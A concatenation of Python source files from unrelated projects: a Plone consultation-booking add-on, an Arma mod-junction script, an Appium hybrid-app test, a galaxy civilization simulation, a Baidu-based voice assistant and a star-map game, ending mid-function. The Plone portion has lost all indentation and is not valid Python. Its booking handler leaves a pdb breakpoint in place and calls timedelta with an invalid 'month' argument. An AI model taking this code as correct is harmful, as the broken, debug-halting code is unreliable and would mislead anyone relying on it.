schema = ITimeSlotAddForm
ignoreContext = True
css_class = "o-form o-form--widget"
label = _(u"Consultation time slots")
enableCSRFProtection = True
formErrorsMessage = _(u"There were errors.")
submitted = False
@property
def action(self):
""" Rewrite HTTP POST action.
# If the form is rendered embedded on the others pages we
make sure the form is posted through the same view always,
instead of making HTTP POST to the page where the form was rendered.
"""
return self.context.absolute_url() + "/@@create-time-slot-form"
@property
def next_url(self):
context = aq_inner(self.context)
url = "{0}/@@manage-time-slots".format(context.absolute_url())
return url
def configured_time_slots(self):
context = aq_inner(self.context)
time_slots = list()
stored_time_slots = getattr(context, "time_slots", None)
if stored_time_slots:
for slot in stored_time_slots:
slot_values = slot.split("|")
time_slots.append({"start": slot_values[0], "end": slot_values[1]})
return time_slots
@staticmethod
def _compose_time_slot_data(
date_base, slot_hour, slot_minutes, slot_hour_end, slot_minutes_end
):
slot = {
"slot_code": secrets.token_urlsafe(64),
"slot_time": date_base.replace(
hour=int(slot_hour), minute=int(slot_minutes), second=00
),
"slot_time_end": date_base.replace(
hour=int(slot_hour_end), minute=int(slot_minutes_end), second=00
),
"bookable": True,
}
return slot
def generate_time_slots(self, consultation_date):
generated_time_slots = list()
configured_slots = self.configured_time_slots()
for desired_slot in configured_slots:
# Iterate over configured desired time slots and generate
# datetime objects
try:
slot_start = desired_slot["start"].split(":")
slot_end = desired_slot["end"].split(":")
slot_data = self._compose_time_slot_data(
consultation_date,
slot_start[0],
slot_start[1],
slot_end[0],
slot_end[1],
)
generated_time_slots.append(slot_data)
except IndexError:
# Some exception handler should be in place
pass
return generated_time_slots
def prepare_time_slots(self, data):
time_slots = list()
cycle_date = data["time_slot"]
if data["time_slots_creation"]:
cycle_end = data["time_slots_until"]
else:
cycle_end = cycle_date
step = datetime.timedelta(month=1)
days_in_cycle = list()
while cycle_date <= cycle_end:
days_in_cycle.append(cycle_date)
cycle_date += step
if days_in_cycle:
# Generate time slots for all stored time slots
for single_date in days_in_cycle:
time_slots.extend(self.generate_time_slots(single_date))
return time_slots
def applyChanges(self, data):
generator = getUtility(IConsultationSlotGenerator)
time_slots = self.prepare_time_slots(data)
for time_slot in time_slots:
consultation_slot = ConsultationSlot(
consultationSlotCode=time_slot["slot_code"],
consultationSlotTime=time_slot["slot_time"],
consultationSlotTimeEnd=time_slot["slot_time_end"],
bookable=time_slot["bookable"],
)
try:
generator(consultation_slot)
except TimeSlotGenerationError as error:
api.portal.show_message(
str(error),
self.request,
type="error"
)
return self.request.response.redirect(self.next_url)
@button.buttonAndHandler(_(u"cancel"), name="cancel")
def handleCancel(self, action):
self.status = _(u"The process has been cancelled.")
return self.request.response.redirect(addTokenToUrl(self.next_url))
@button.buttonAndHandler(_(u"Create"), name="create")
def handleApply(self, action):
request = self.request
data, errors = self.extractData()
if errors:
self.status = self.formErrorsMessage
return
if request.get("form.buttons.create", None):
self.submitted = True
self.applyChanges(data)
self.status = "Thank you very much!"
def updateActions(self):
super(TimeSlotAddForm, self).updateActions()
self.actions["cancel"].addClass(
"c-button--default c-button--cancel c-button--panel"
)
self.actions["create"].addClass("c-button--primary")
class TimeSlotAdd(FormWrapper):
form = TimeSlotAddForm
def __call__(self, debug="off", **kw):
self.params = {"debug_mode": debug}
# self._update_panel_editor(self.params)
self.update()
return self.render()
def configured_time_slots(self):
context = aq_inner(self.context)
time_slots = list()
stored_time_slots = getattr(context, "time_slots", None)
if stored_time_slots:
for slot in stored_time_slots:
slot_values = slot.split("|")
time_slots.append({"start": slot_values[0], "end": slot_values[1]})
return time_slots
def weekday_name(self, weekday):
context = aq_inner(self.context)
vocabulary_name = "plone.app.vocabularies.Weekdays"
factory = getUtility(IVocabularyFactory, vocabulary_name)
vocabulary = factory(context)
translation_service = api.portal.get_tool(name="translation_service")
weekday_name = translation_service.translate(
vocabulary.getTerm(weekday).title,
"plone",
target_language=api.portal.get_default_language(),
)
return weekday_name
```
#### File: cos/browser/schedule.py
```python
import secrets
import json
from AccessControl import Unauthorized
from Acquisition import aq_inner
from ade25.base.interfaces import IContentInfoProvider
from ade25.base.mailer import send_mail, prepare_email_message, \
create_plaintext_message, get_mail_template
from ade25.base.utils import encrypt_data_stream
from plone import api
from Products.CMFPlone.utils import safe_unicode
from Products.Five.browser import BrowserView
from zExceptions import NotFound
from zope.component import getMultiAdapter, getUtility
from zope.interface import implementer
from zope.publisher.interfaces import IPublishTraverse
from lra.cos.appointments import ConsultationAppointment
from lra.cos.config import BOOKING_FORM
from lra.cos.interfaces import (AppointmentGenerationError,
IConsultationAppointmentGenerator,
IConsultationSlotLocator)
from lra.cos import _
class ConsultingScheduleView(BrowserView):
""" Consulting schedule view """
@staticmethod
def is_editable():
editable = False
if not api.user.is_anonymous():
editable = True
return editable
def show_toolbar(self):
context = aq_inner(self.context)
display_toolbar = False
if self.is_editable():
# Explicitly check for permissions
current_user = api.user.get_current()
display_toolbar = api.user.has_permission(
'LRA Consultation Slots: Manage Slots',
user=current_user,
obj=context
)
return display_toolbar
def has_lead_image(self):
context = aq_inner(self.context)
try:
lead_img = context.image
except AttributeError:
lead_img = None
if lead_img is not None:
return True
return False
def rendered_widget(self):
context = aq_inner(self.context)
view_name = '@@content-widget-lra-consultation-schedule'
rendered_widget = context.restrictedTraverse(view_name)()
return rendered_widget
@implementer(IPublishTraverse)
class BookAppointment(BrowserView):
errors = dict()
form_data = dict()
slot_identifier = None
def __call__(self, debug="off", **kw):
self.params = {"debug_mode": debug}
# self._update_panel_editor(self.params)
self.update()
return self.render()
def render(self):
return self.index()
def update(self):
self.errors = dict()
unwanted = ('_authenticator', 'form.button.Submit')
required = self.form_fields_required_base()
required_boolean = self.form_fields_required_boolean()
if 'form.button.Submit' in self.request:
authenticator = getMultiAdapter((self.context, self.request),
name=u"authenticator")
if not authenticator.verify():
raise Unauthorized
form = self.request.form
form_data = {}
form_errors = {}
error_idx = 0
for field_name in required_boolean:
if not field_name in form:
form_errors[field_name] = self.required_field_error()
error_idx += 1
for value in form:
if value not in unwanted:
form_data[value] = safe_unicode(form[value])
if not form[value] and value in required:
form_errors[value] = self.required_field_error()
error_idx += 1
else:
error = {
'active': False,
'msg': form[value]
}
form_errors[value] = error
if error_idx > 0:
self.errors = form_errors
self.form_data = form_data
else:
self.book_consultation_slot(form)
def publishTraverse(self, request, name):
"""When traversing to .../@@book-appointment/time-slot-code, store the
film code and return self; the next step will be to render the view,
which can then use the code.
"""
if self.slot_identifier is None:
self.slot_identifier = name
return self
else:
raise NotFound()
@staticmethod
def default_value(error):
value = ''
if error['active'] is True:
value = error['msg']
return value
def default_error(self, field_name):
default_field_error = {'active': False, 'msg': ''}
return self.errors.get(field_name, default_field_error)
@staticmethod
def required_field_error():
translation_service = api.portal.get_tool(name="translation_service")
error = {}
error_msg = _(u"This field is required")
error['active'] = True
error['msg'] = translation_service.translate(
error_msg,
'lra.cos',
target_language=api.portal.get_default_language()
)
return error
def default_field_value(self, field_name):
return getattr(self.request, field_name, None)
@staticmethod
def _compose_message(data, template_name):
portal = api.portal.get()
portal_url = portal.absolute_url()
template_vars = {
'email': data['email'],
'subject': str(data['subject']),
'message': data['comment'],
'url': portal_url
}
template_name = template_name
message = get_mail_template(template_name, template_vars)
return message
def prepare_booking_request(self, form_data):
booking_request = dict()
form_fields = self.form_fields()
for field_id, field_details in form_fields.items():
field_name = field_details.get("name")
field_name_key = "{0}_title".format(field_name)
booking_request.update({
field_id: form_data.get(field_id, ""),
field_name_key: field_name
})
return booking_request
def send_confirmation_mail(self, mail_to, subject, form_data, template_name):
email_subject = api.portal.translate(
"Inquiry from website visitor",
'ade25.contacts',
api.portal.get_current_language())
mail_tpl = self._compose_message(form_data, template_name)
mail_plain = create_plaintext_message(mail_tpl)
msg = prepare_email_message(mail_tpl, mail_plain)
recipients = [mail_to, ]
send_mail(
msg,
recipients,
subject
)
return
def send_confirmation(self, form_data, appointment):
context = aq_inner(self.context)
email_from = api.portal.get_registry_record("plone.email_from_address")
email_from_name = api.portal.get_registry_record("plone.email_from_name")
contact_email = getattr(context, "contact_email", email_from)
mail_to = form_data.get("email")
mail_content = {
"sender_name": email_from_name,
"sender_email": contact_email,
"appointment_code": appointment.get("consultationAppointmentCode")
}
mail_content.update(self.requested_time_slot())
mail_content.update(self.prepare_booking_request(form_data))
return
def prepare_appointment_data(self, data):
appointment = {
"consultationAppointmentCode": secrets.token_urlsafe(64),
"consultationAppointmentConstructionYear": data.get("construction_year"),
"consultationAppointmentContactEmail": data.get("email"),
"consultationAppointmentContactFirstName": data.get("first_name"),
"consultationAppointmentContactLastName": data.get("last_name"),
"consultationAppointmentContactSalutation": "",
"consultationAppointmentRequest": encrypt_data_stream(json.dumps(data)),
"consultationSlotCode": self.slot_identifier,
"data_protection_notice": True,
"privacy_notice": True
}
import pdb; pdb.set_trace()
return appointment
def book_consultation_slot(self, data):
context = aq_inner(self.context)
generator = getUtility(IConsultationAppointmentGenerator)
appointment = self.prepare_appointment_data(data)
try:
generator(appointment)
except AppointmentGenerationError as error:
api.portal.show_message(
str(error),
self.request,
type="error"
)
self.send_confirmation(data, appointment)
next_url = '{0}/@@book-appointment-success/{1}'.format(
context.absolute_url(),
appointment.get("consultationAppointmentCode")
)
return self.request.response.redirect(next_url)
@staticmethod
def time_stamp(item, date_time):
content_info_provider = IContentInfoProvider(item)
time_stamp = content_info_provider.time_stamp(date_time)
return time_stamp
def requested_time_slot(self):
context = aq_inner(self.context)
locator = getUtility(IConsultationSlotLocator)
time_slot = locator.time_slot(self.slot_identifier)
time_slot.update({
"slot_start": self.time_stamp(context, time_slot['slot_time']),
"slot_end": self.time_stamp(context, time_slot['slot_time_end'])
})
return time_slot
@staticmethod
def form_setup():
return BOOKING_FORM
def form_fields(self):
fields = dict()
for field_set in self.form_setup().values():
for field in field_set.get("fields", list()):
field_id = field.get("id")
field.pop("id")
fields.update({
field_id: field
})
return fields
def form_fields_required(self):
required_fields = {}
for field_set in self.form_setup().values():
for field in field_set.get("fields", list()):
if field["required"]:
required_fields.update({field["id"]: field["field_type"]})
return required_fields
def form_fields_required_boolean(self):
required = [
form_field
for form_field, field_type in self.form_fields_required().items()
if field_type in ["boolean", "privacy"]
]
return required
def form_fields_required_base(self):
required = [
form_field
for form_field, field_type in self.form_fields_required().items()
if field_type not in ["boolean", "privacy"]
]
return required
@implementer(IPublishTraverse)
class BookAppointmentSuccess(BrowserView):
appointment_identifier = None
def publishTraverse(self, request, name):
"""When traversing to .../@@book-appointment-success/appointment-code,
extract the necessary information and provide appropriate user feedback.
"""
if self.appointment_identifier is None:
self.appointment_identifier = name
return self
else:
raise NotFound()
```
#### File: lra/cos/__init__.py
```python
from sqlalchemy.ext import declarative
from z3c.saconfig import named_scoped_session
from zope.i18nmessageid import MessageFactory
_ = MessageFactory('lra.cos')
def initialize(context):
"""Initializer called when used as a Zope 2 product."""
# Create a base class used for object relational mapping classes
ORMBase = declarative.declarative_base()
Session = named_scoped_session('lra_cos')
```
#### File: sitecontent/tests/test_setup.py
```python
from lra.sitecontent.testing import IntegrationTestCase
from plone import api
class TestInstall(IntegrationTestCase):
"""Test installation of lra.sitecontent into Plone."""
def setUp(self):
"""Custom shared utility setup for tests."""
self.portal = self.layer['portal']
self.installer = api.portal.get_tool('portal_quickinstaller')
def test_product_installed(self):
"""Test if lra.sitecontent is installed with portal_quickinstaller."""
self.assertTrue(self.installer.isProductInstalled('lra.sitecontent'))
def test_uninstall(self):
"""Test if lra.sitecontent is cleanly uninstalled."""
self.installer.uninstallProducts(['lra.sitecontent'])
self.assertFalse(self.installer.isProductInstalled('lra.sitecontent'))
# browserlayer.xml
def test_browserlayer(self):
"""Test that ILraSitecontentLayer is registered."""
from lra.sitecontent.interfaces import ILraSitecontentLayer
from plone.browserlayer import utils
self.failUnless(ILraSitecontentLayer in utils.registered_layers())
```
#### File: lra/sitecontent/upgrades.py
```python
import logging
from zope.globalrequest import getRequest
from plone import api
from plone.app.upgrade.utils import cleanUpSkinsTool
default_profile = 'profile-lra.sitecontent:default'
log = logging.getLogger(__name__)
def remove_ploneformgen(context=None):
portal = api.portal.get()
portal_types = api.portal.get_tool('portal_types')
portal_catalog = api.portal.get_tool('portal_catalog')
qi = api.portal.get_tool('portal_quickinstaller')
log.info('removing PloneFormGen')
old_types = [
'FormFolder',
]
old_types = [i for i in old_types if i in portal_types]
for old_type in old_types:
for brain in portal_catalog(portal_type=old_type):
log.info(u'Deleting Existing Instances of {}!'.format(old_type))
api.content.delete(brain.getObject(), check_linkintegrity=True)
try:
portal.manage_delObjects(['formgen_tool'])
except AttributeError:
pass
try:
portal.portal_properties.manage_delObjects(['ploneformgen_properties'])
except BadRequest:
pass
if qi.isProductInstalled('PloneFormGen'):
qi.uninstallProducts(['PloneFormGen'])
if qi.isProductInstalled('Products.PloneFormGen'):
qi.uninstallProducts(['Products.PloneFormGen'])
def migrate_ATBTreeFolder(context=None):
"""Replace very old containers for news, events and Members
"""
from plone.portlets.interfaces import ILocalPortletAssignmentManager
from plone.portlets.interfaces import IPortletManager
from zope.component import getMultiAdapter
from zope.component import queryUtility
portal = api.portal.get()
# create new containers:
if not portal['Members'].__class__.__name__ == 'ATBTreeFolder':
log.info('Migrating ATBTreeFolder not needed')
return
log.info('Migrating ATBTreeFolders')
members_new = api.content.create(
container=portal,
type='Folder',
id='members_new',
title=u'Benutzer',
)
members_new.setOrdering('unordered')
members_new.setLayout('@@member-search')
# Block all right column portlets by default
manager = queryUtility(IPortletManager, name='plone.rightcolumn')
if manager is not None:
assignable = getMultiAdapter(
(members_new, manager),
ILocalPortletAssignmentManager
)
assignable.setBlacklistStatus('context', True)
assignable.setBlacklistStatus('group', True)
assignable.setBlacklistStatus('content_type', True)
for item in portal.Members.contentValues():
api.content.move(
source=item,
target=members_new,
)
api.content.delete(obj=portal['Members'], check_linkintegrity=False)
api.content.rename(obj=portal['members_new'], new_id='Members')
def uninstall_archetypes(context=None):
portal = api.portal.get()
request = getRequest()
installer = api.content.get_view('installer', portal, request)
addons = [
'Archtypes',
'ATContentTypes',
'plone.app.referenceablebehavior',
'plone.app.blob',
'plone.app.imaging',
]
for addon in addons:
if installer.is_product_installed(addon):
installer.uninstall_product(addon)
def remove_archetypes_traces(context=None):
portal = api.portal.get()
# remove obsolete AT tools
tools = [
'portal_languages',
'portal_tinymce',
'kupu_library_tool',
'portal_factory',
'portal_atct',
'uid_catalog',
'archetype_tool',
'reference_catalog',
'portal_metadata',
]
for tool in tools:
if tool not in portal.keys():
log.info('Tool {} not found'.format(tool))
continue
try:
portal.manage_delObjects([tool])
log.info('Deleted {}'.format(tool))
except Exception as e:
log.info(u'Problem removing {}: {}'.format(tool, e))
try:
log.info(u'Fallback to remove without permission_checks')
portal._delObject(tool)
log.info('Deleted {}'.format(tool))
except Exception as e:
log.info(u'Another problem removing {}: {}'.format(tool, e))
def pack_database(context=None):
"""Pack the database"""
portal = api.portal.get()
app = portal.__parent__
db = app._p_jar.db()
db.pack(days=0)
def cleanup_in_plone52(context=None):
migrate_ATBTreeFolder()
uninstall_archetypes()
remove_archetypes_traces()
portal = api.portal.get()
cleanUpSkinsTool(portal)
qi = api.portal.get_tool('portal_quickinstaller')
# Fix diazo theme
qi.reinstallProducts(['plone.app.theming'])
# Fix issue where we cannot pack the DB after it was migrated to Python 3
qi.reinstallProducts(['plone.app.relationfield'])
pack_database()
def upgrade_1001(setup):
# Cleanup installation
cleanup_in_plone52()
```
#### File: lra/sitetheme/__init__.py
```python
from zope.i18nmessageid import MessageFactory
_ = MessageFactory('lra.sitetheme')
def initialize(context):
"""Initializer called when used as a Zope 2 product."""
``` |
{
"source": "A26mike/Arma-Python-server-manager",
"score": 3
} |
#### File: A26mike/Arma-Python-server-manager/testing.py
```python
import os
def get_directory_structure(rootdir):
"""
Creates a nested dictionary that represents the folder structure of rootdir
"""
dir = {}
rootdir = rootdir.rstrip(os.sep)
start = rootdir.rfind(os.sep) + 1
for path, dirs, files in os.walk(rootdir):
folders = path[start:].split(os.sep)
subdir = dict.fromkeys(files)
parent = reduce(dict.get, folders[:-1], dir)
parent[folders[-1]] = subdir
return dir
for i in range(0, modlistsize):
if not os.path.exists(servermodpath_list[i]):
os.system( 'mklink /J ' + servermodpath_list[i] + ' ' + steammod_list[i] )
print(steammod_list[i] + ' ' + servermodpath_list[i] )
# makes Junctions on a loop checks if they were already made
# need to check if there are extra junctions that the user did not select
# need to ignore spaces in the path
from tkinter import Tk
from tkinter import filedialog
import os
root = Tk()
root.withdraw()
current_directory = filedialog.askdirectory()
file_name = "test.txt"
file_path = os.path.join(current_directory,file_name)
print(file_path)
# use the os.path.join method to join paths rather than a simple + string concatenation. This way the code will work on multiple platforms (Windows/Mac/Linux)
# For example
listbox = Listbox(frame)
for name in files(dir):
listbox.insert('end', name)
``` |
{
"source": "a2734961/AutomatedTestingDemo",
"score": 3
} |
#### File: AutomatedTestingDemo/hybrid_app/HybridScript.py
```python
import unittest
import time
from appium import webdriver
class MyTestCase(unittest.TestCase):
def setUp(self):
# 定义初始化的属性信息
self.desired_caps = {}
self.desired_caps['platformName'] = 'Android'
self.desired_caps['platformVersion'] = '6.0'
self.desired_caps['deviceName'] = '192.168.115.101:5555'
self.desired_caps['appPackage'] = 'com.hyd.miniwebbrowser'
self.desired_caps['appActivity'] = '.MainActivity'
self.desired_caps["unicodeKeyboard"] = "True"
self.desired_caps["resetKeyboard"] = "True"
self.desired_caps["automationName"] = "Selendroid"
self.driver = webdriver.Remote('http://localhost:4723/wd/hub', self.desired_caps)
def testSearch(self):
# Locate 定位输入框
input_url = self.driver.find_element_by_id("et_url")
# Operate 操作
input_url.send_keys("https://wap.sogou.com")
btn_search = self.driver.find_element_by_id("btn_search")
btn_search.click()
time.sleep(5)
# Switch 切换当前的上下文
print self.driver.contexts
self.driver.switch_to.context('WEBVIEW_0')
print self.driver.current_context
time.sleep(5)
# 定位web输入框
web_input = self.driver.find_element_by_xpath('//*[@id="keyword"]')
web_input.click()
web_input.send_keys("2020")
web_search_button = self.driver.find_element_by_xpath('//*[@id="searchform"]/div/div/div[1]/div[2]/input')
web_search_button.click()
time.sleep(5)
# 检验查询结果
first_result = self.driver.find_element_by_xpath('//*[@id="sogou_vr_30010212_1"]/div/div[1]/a[1]')
self.assertTrue("2020" in first_result.text)
def tearDown(self):
self.driver.quit()
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "a276me/Dark_Forest_Simulation",
"score": 3
} |
#### File: a276me/Dark_Forest_Simulation/Galaxy.py
```python
import math
import random
import Civilization
class Galaxy:
def __init__(self, x : int , y: int, InitCivs: int, MaxCivs=100, slowStart=True):
self.Civilizations = []
self.Dead = []
self.Max = InitCivs
self.civsMade = 0
self.Xsize = x
self.Ysize = y
self.NewCiv = False
self.New = []
self.age = 0
self.initializing = True
self.Stats = {'Wars':0, 'Cease Fires':0, 'Civilizations':0, 'Conveys':0, 'Ally Aids':0, 'Civil Wars':0}
if not slowStart:
for i in range(InitCivs):
self.Civilizations.append(Civilization.Civilization(self))
print(self.Civilizations[-1].transformCoord())
self.Stats['Civilizations'] +=1
else:
self.slowInit()
def slowInit(self):
if self.civsMade < self.Max and self.initializing:
for i in range(random.randint(-2,5)):
if self.civsMade < self.Max:
self.create()
self.civsMade +=1
else:
self.initializing = False
def create(self):
new = Civilization.Civilization(self)
self.New.append(new)
self.Civilizations.append(new)
self.NewCiv = True
self.Stats['Civilizations'] +=1
def newCiv(self):
self.NewCiv = False
if random.randint(0,100) < 1:
self.create()
def removeCiv(self, civ):
# remove Civ if civilization is dead
print(civ.Name+' Has been Destroyed')
self.Dead.append(civ)
self.Civilizations.remove(civ)
# remove the civ from all War lists
for i in self.Civilizations:
if civ in i.War:
i.War.remove(civ)
# remove the civ from knownCivs list
for i in self.Civilizations:
if civ in i.KnownCivs:
i.KnownCivs.remove(civ)
for i in self.Civilizations:
if civ in i.Ally:
i.Ally.remove(civ)
def end(self):
if len(self.Civilizations)<=1 and self.initializing is False:
return True
else:
return False
def getTotalConveys(self):
ret = []
for i in self.Civilizations:
for c in i.Conveys:
ret.append(c)
return ret
def getWinner(self):
if self.end():
return self.Civilizations[0]
def move(self):
self.slowInit()
self.newCiv()
for i in self.Civilizations:
i.move()
print(i)
self.age +=1
def getCivilizations(self, x,y,r):
ret = []
for i in self.Civilizations:
if x == i.X and y == i.Y:
continue
elif math.sqrt(((i.X-x)**2)+((i.Y-y)**2)) <= r: #勾股定理来求范围
ret.append(i)
return ret
def getDistance(self, civ1, civ2):
return round(math.sqrt(((civ1.X-civ2.X)**2)+((civ1.Y-civ2.Y)**2)), 2)
if __name__ == '__main__':
Gal = Galaxy(10,10,10)
while True:
Gal.move()
print('***************')
for i in Gal.getTotalConveys():
print(i)
print('---------------')
input()
```
#### File: a276me/Dark_Forest_Simulation/Tools.py
```python
import math
def getDistance(civ1, civ2):
return round(math.sqrt(((civ1.X-civ2.X)**2)+((civ1.Y-civ2.Y)**2)),2)
def getQuad(origin, target):
if target.X >= origin.X and target.Y >= origin.Y: # 目标文明在发送者为中心的第一象限(右上角)
return 1
elif target.X >= origin.X and target.Y <= origin.Y: # 目标文明在发送者为中心的第四象限(右下角)
return 4
elif target.X <= origin.X and target.Y >= origin.Y: # 目标文明在发送者为中心的第二象限(左上角)
return 2
elif target.X <= origin.X and target.Y <= origin.Y: # 目标文明在发送者为中心的第三象限(左下角)
return 3
def calculateAngle(origin, target, convey):
'''
return the degree angle of origin to target
'''
if target.X >= origin.X and target.Y >= origin.Y: # 目标文明在发送者为中心的第一象限(右上角)
return math.asin(abs(target.X-origin.X)/convey.Distance)*(180/math.pi)
elif target.X >= origin.X and target.Y <= origin.Y: # 目标文明在发送者为中心的第四象限(右下角)
return math.asin(-1*abs(target.X-origin.X)/convey.Distance)*(180/math.pi)
elif target.X <= origin.X and target.Y >= origin.Y: # 目标文明在发送者为中心的第二象限(左上角)
return math.acos(-1*abs(target.X-origin.X)/convey.Distance)*(180/math.pi)
elif target.X <= origin.X and target.Y <= origin.Y: # 目标文明在发送者为中心的第三象限(左下角)
temp = math.acos(-1*abs(target.X-origin.X)/convey.Distance)
return ((math.pi - temp) + math.pi)*(180/math.pi)
``` |
{
"source": "a276me/iris",
"score": 2
} |
#### File: a276me/iris/action.py
```python
import command
import pyttsx3 as pt
import apps
def do(cmd: command.Command):
if cmd.object is None:
e = pt.Engine()
e.say('sorry sir, i do not understand that')
e.runAndWait()
else:
cmd.object['main'].__call__(cmd)
```
#### File: a276me/iris/apps.py
```python
import pyttsx3 as pt
import sys
import random
import scipy.io.wavfile as wav
import sounddevice as sd
def shutdown(cmd):
e = pt.Engine()
e.say("good bye sir")
e.runAndWait()
sys.exit(101)
def record_denoiser(cmd):
e = pt.Engine()
e.say("Recording a new noise file")
e.runAndWait()
e.say("please remain silent for the best possible effect")
e.runAndWait()
e.say("starting in 3, 2, 1")
e.runAndWait()
fs = 16000
myrecording = sd.rec(int(4 * fs), samplerate=fs, channels=1, dtype='int16')
sd.wait() # Wait until recording is finished
e.say("finished")
e.runAndWait()
sd.play(myrecording, fs)
sd.wait()
wav.write(f'./tmp/static.wav', fs, myrecording)
routes = [
{'name': 'shutdown', 'main': shutdown, 'keys': ['exit','shutdown','shut down']},
{'name': 'new denoiser', 'main': record_denoiser, 'keys': ['denoiser','record','new denoiser','e nois']}
]
```
#### File: a276me/iris/initiate.py
```python
import wave
import requests
import time
import base64
import numpy as np
from pyaudio import *
import noisereduce as nr
import scipy.io.wavfile as wav
import matplotlib.pyplot as plt
import sounddevice as sd
import soundfile as sf
import denoise
import pyttsx3 as pt
import re
import random
SEC = 4
framerate = 16000 # 采样率
num_samples = 1024 # 采样点
channels = 1 # 声道
sampwidth = 2 # 采样宽度2bytes
FILEPATH = 'speech.wav'
base_url = "https://openapi.baidu.com/oauth/2.0/token?grant_type=client_credentials&client_id=%s&client_secret=%s"
APIKey = "*******"
SecretKey = "*******"
HOST = base_url % (APIKey, SecretKey)
def getToken(host):
res = requests.post(host)
return res.json()['access_token']
def save_wave_file(filepath, data):
wf = wave.open(filepath, 'wb')
wf.setnchannels(channels)
wf.setsampwidth(sampwidth)
wf.setframerate(framerate)
wf.writeframes(b''.join(data))
wf.close()
def my_record(sec, wake_val: float=0.05):
print('record')
# pa = PyAudio()
# stream = pa.open(format=paInt16, channels=channels,
# rate=framerate, input=True, frames_per_buffer=num_samples)
# my_buf = []
# # count = 0
# t = time.time()
# # print('正在录音...')
#
# while time.time() < t + 2: # 秒
# string_audio_data = stream.read(num_samples)
# my_buf.append(string_audio_data)
# # print('录音结束.')
# save_wave_file(FILEPATH, my_buf)
# stream.close()
while True:
test = sd.rec(int(16000*0.5), 16000,1)
sd.wait()
# plt.plot(recc)
# plt.show()
for i in test:
if i > wake_val:
recc = sd.rec(int(sec * framerate), samplerate=framerate, channels=1, dtype='int16')
sd.wait()
# denoise.denoiser(FILEPATH)
recc = np.concatenate((test, recc))
wav.write(FILEPATH, framerate, recc)
return
def get_audio(file):
# fp, data = wav.read(file)
# t, n = wav.read('./tmp/static.wav')
# print(n.dtype)
# print(data.dtype)
# data.dtype = 'float32'
#
# ret = nr.reduce_noise(audio_clip=data,
# noise_clip=n, verbose=False)
# ret = np.asarray(ret)
# print(ret)
# plt.plot(ret)
# # plt.plot(data)
# # plt.plot(n)
# plt.show()
#
# print(ret)
# wav.write(file, rate=fp, data=ret)
with open(file, 'rb') as f:
data = f.read()
return data
def speech2text(speech_data, token, dev_pid=1537):
FORMAT = 'wav'
RATE = '16000'
CHANNEL = 1
CUID = '*******'
SPEECH = base64.b64encode(speech_data).decode('utf-8')
data = {
'format': FORMAT,
'rate': RATE,
'channel': CHANNEL,
'cuid': CUID,
'len': len(speech_data),
'speech': SPEECH,
'token': <PASSWORD>,
'dev_pid': dev_pid
}
url = 'https://vop.baidu.com/server_api'
headers = {'Content-Type': 'application/json'}
# r=requests.post(url,data=json.dumps(data),headers=headers)
# print('正在识别...')
r = requests.post(url, json=data, headers=headers)
Result = r.json()
print(Result)
if 'result' in Result:
return Result['result'][0]
else:
return ' '
# def openbrowser(text):
# maps = {
# '百度': ['百度', 'baidu'],
# '腾讯': ['腾讯', 'tengxun'],
# '网易': ['网易', 'wangyi']
#
# }
# if text in maps['百度']:
# webbrowser.open_new_tab('https://www.baidu.com')
# elif text in maps['腾讯']:
# webbrowser.open_new_tab('https://www.qq.com')
# elif text in maps['网易']:
# webbrowser.open_new_tab('https://www.163.com/')
# else:
# webbrowser.open_new_tab('https://www.baidu.com/s?wd=%s' % text)
def get_mean():
data, fs = sf.read('./tmp/static.wav', dtype='float32')
d = [abs(i) for i in data]
return np.average(d)*5
def initiate():
devpid = 1737 # input('1536:普通话(简单英文),1537:普通话(有标点),1737:英语,1637:粤语,1837:四川话\n')
print(get_mean())
my_record(2, get_mean())
t = time.time()
denoise.denoiser(FILEPATH)
TOKEN = getToken(HOST)
speech = get_audio(FILEPATH)
result = speech2text(speech, TOKEN, int(devpid))
print(time.time()-t)
if type(result) == str:
return result
# if type(result) == str:
# openbrowser(result.strip(','))
# flag = input('Continue?(y/n):')
def waitcall():
activations = ['iris', 'Irish', 'irish', 'IRS', 'iris']
reps = ['at your service', 'i am listening', 'may i help you sir', 'what can i do for you']
engine = pt.engine.Engine()
while True:
ret = initiate()
if ret:
print(ret)
for i in activations:
if i in ret:
engine.say('yes sir?')
engine.say(random.choice(reps))
engine.runAndWait()
return True
def recognize_command():
my_record(4, get_mean()*0.8)
denoise.denoiser(FILEPATH)
TOKEN = getToken(HOST)
speech = get_audio(FILEPATH)
result = speech2text(speech, TOKEN, int(1737))
if type(result) == str:
return result
if __name__ == '__main__':
sentence = ['']
activations = ['iris', 'Irish', 'irish', 'IRS']
engine = pt.engine.Engine()
while True:
initiate()
print(sentence)
last = sentence[-1]
last = last.split(' ')
for i in last:
if i in activations:
engine.say('yes sir?')
engine.runAndWait()
break
``` |
{
"source": "a276me/project-42",
"score": 3
} |
#### File: core/dep/main.py
```python
import readcsv
import random
import pygame
from core.star import Star
from core.Civilization import *
from pygame.locals import *
from core.misc import *
CIVS = []
STARS = []
def setup():
global CIVS, STARS
q, w = readcsv.getpoints()
P = [[q[i],w[i]] for i in range(len(q))]
CIVS = [Civilization('neutral',0), Civilization('test',25),Civilization('test',10)]
CIVS[0].color = (255,255,255)
# cdef int i = 0
for i in range(2000):
p = random.choice(P)
STARS.append(Star(p[0], p[1]))
def move():
global CIVS
# cdef int k = 0
# cdef int j = 0
# cdef int i
for c in range(1, len(CIVS), 1):
newsys = []
for k in range(CIVS[c].tech):
# if len(CIVS[c].tmp) > len(CIVS[c].systems)*0.8:
# CIVS[c].tmp = []
i = random.choice(CIVS[c].systems)
# while i in CIVS[c].tmp:
# i = random.choice(CIVS[c].systems)
nps = []
for j in range(len(STARS)):
if dist(STARS[i].POS, STARS[j].POS) < 10+CIVS[c].tech and j not in CIVS[c].systems:
nps.append(j)
# print(len(CIVS[c].systems))
if len(nps) > 0: newsys.append(random.choice(nps))
CIVS[c].systems += newsys
for i in newsys:
CIVS[STARS[i].owner].remove(i)
STARS[i].owner = CIVS[c].id
if random.randint(0,1000) < 5:
CIVS[c].tech += 1
print('tech increased')
elif random.randint(0,1000) < 2:
CIVS[c].tech -= 1
print('tech decreased')
# print(CIVS[c].tech)
if random.randint(0,1000) < 5:
print('civilization formed!')
CIVS.append(Civilization('test', random.choice(CIVS[0].systems)))
if random.randint(0,1000) < 20:
print(len(CIVS[0].systems))
return 1
```
#### File: a276me/project-42/readcsv.py
```python
import csv
def getpoints():
with open('points.csv', mode="r") as csv_file:
reader = csv.reader(csv_file)
a = []
for item in reader:
a.append(item)
